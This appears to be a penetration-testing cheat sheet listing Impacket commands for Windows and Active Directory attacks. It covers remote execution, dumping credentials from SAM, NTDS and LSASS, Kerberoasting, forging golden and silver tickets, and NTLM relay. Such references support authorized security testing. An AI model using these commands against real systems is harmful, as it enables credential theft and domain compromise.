Impacket Quick Reference
Hackers Manifest - hackersmanifest.com
Python tools for Windows network protocols and Active Directory attacks.
🖥️ Remote Execution
| Task | Command |
|---|---|
| PSExec | psexec.py DOMAIN/user:pass@TARGET |
| PSExec w/ hash | psexec.py DOMAIN/user@TARGET -hashes :NTLM |
| WMIExec | wmiexec.py DOMAIN/user:pass@TARGET |
| SMBExec | smbexec.py DOMAIN/user:pass@TARGET |
| ATExec | atexec.py DOMAIN/user:pass@TARGET "cmd" |
| DCOMExec | dcomexec.py -object MMC20 DOMAIN/user:pass@TARGET |
Execution method: PSExec = service | WMI = no file | DCOM = MMC/Shell objects
🔐 Credential Dumping
| Task | Command |
|---|---|
| Remote secrets | secretsdump.py DOMAIN/user:pass@TARGET |
| With hash | secretsdump.py DOMAIN/user@TARGET -hashes :NTLM |
| NTDS only (DC) | secretsdump.py DOMAIN/admin:pass@DC -just-dc |
| Specific user | secretsdump.py ... -just-dc-user krbtgt |
| From local SAM | secretsdump.py -sam SAM -system SYSTEM LOCAL |
| From NTDS | secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL |
🎫 Kerberos Attacks
| Task | Command |
|---|---|
| Get TGT | getTGT.py DOMAIN/user:pass -dc-ip DC_IP |
| TGT w/ hash | getTGT.py DOMAIN/user -hashes :NTLM -dc-ip DC_IP |
| Kerberoast | GetUserSPNs.py DOMAIN/user:pass -dc-ip DC_IP -request |
| AS-REP Roast | GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP |
| Request ST | getST.py -spn cifs/TARGET -impersonate admin DOMAIN/user:pass |
| Use ticket | export KRB5CCNAME=admin.ccache |
| Pass ticket | psexec.py -k -no-pass DOMAIN/admin@TARGET |
🎟️ Ticket Operations
| Task | Command |
|---|---|
| Golden Ticket | ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain DOMAIN admin |
| Silver Ticket | ticketer.py -nthash SVC_HASH -domain-sid SID -domain DOMAIN -spn cifs/target admin |
| kirbi → ccache | ticketConverter.py ticket.kirbi ticket.ccache |
| ccache → kirbi | ticketConverter.py ticket.ccache ticket.kirbi |
| Describe ticket | describeTicket.py ticket.ccache |
📁 SMB Operations
| Task | Command |
|---|---|
| SMB client | smbclient.py DOMAIN/user:pass@TARGET |
| List shares | shares (interactive) |
| Use share | use SHARE (interactive) |
| Get file | get filename (interactive) |
| Put file | put local remote (interactive) |
| SMB server | smbserver.py SHARE /path/to/share |
| SMBv2 server | smbserver.py -smb2support SHARE /path |
📂 LDAP & AD Queries
| Task | Command |
|---|---|
| Get AD users | GetADUsers.py DOMAIN/user:pass -dc-ip DC_IP -all |
| Find delegation | findDelegation.py DOMAIN/user:pass -dc-ip DC_IP |
| LDAP search | ldapsearch -x -H ldap://DC -b "DC=domain,DC=local" |
| lookupsid | lookupsid.py DOMAIN/user:pass@TARGET |
| samrdump | samrdump.py DOMAIN/user:pass@TARGET |
🔄 NTLM Relay
| Task | Command |
|---|---|
| Basic relay | ntlmrelayx.py -t TARGET |
| Relay to LDAP | ntlmrelayx.py -t ldap://DC --escalate-user USER |
| Dump secrets | ntlmrelayx.py -t TARGET --dump-lsass |
| Execute cmd | ntlmrelayx.py -t TARGET -c "whoami" |
| Target list | ntlmrelayx.py -tf targets.txt |
| Responder | responder -I eth0 |
🔧 Other Useful Tools
| Task | Command |
|---|---|
| Registry | reg.py DOMAIN/user:pass@TARGET query -keyName HKLM\\... |
| Services | services.py DOMAIN/user:pass@TARGET list |
| RPC map | rpcdump.py TARGET |
| MSSQL client | mssqlclient.py DOMAIN/user:pass@TARGET |
| Kerberos info | getKerberoastableUsers.py DOMAIN/user:pass@DC |
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com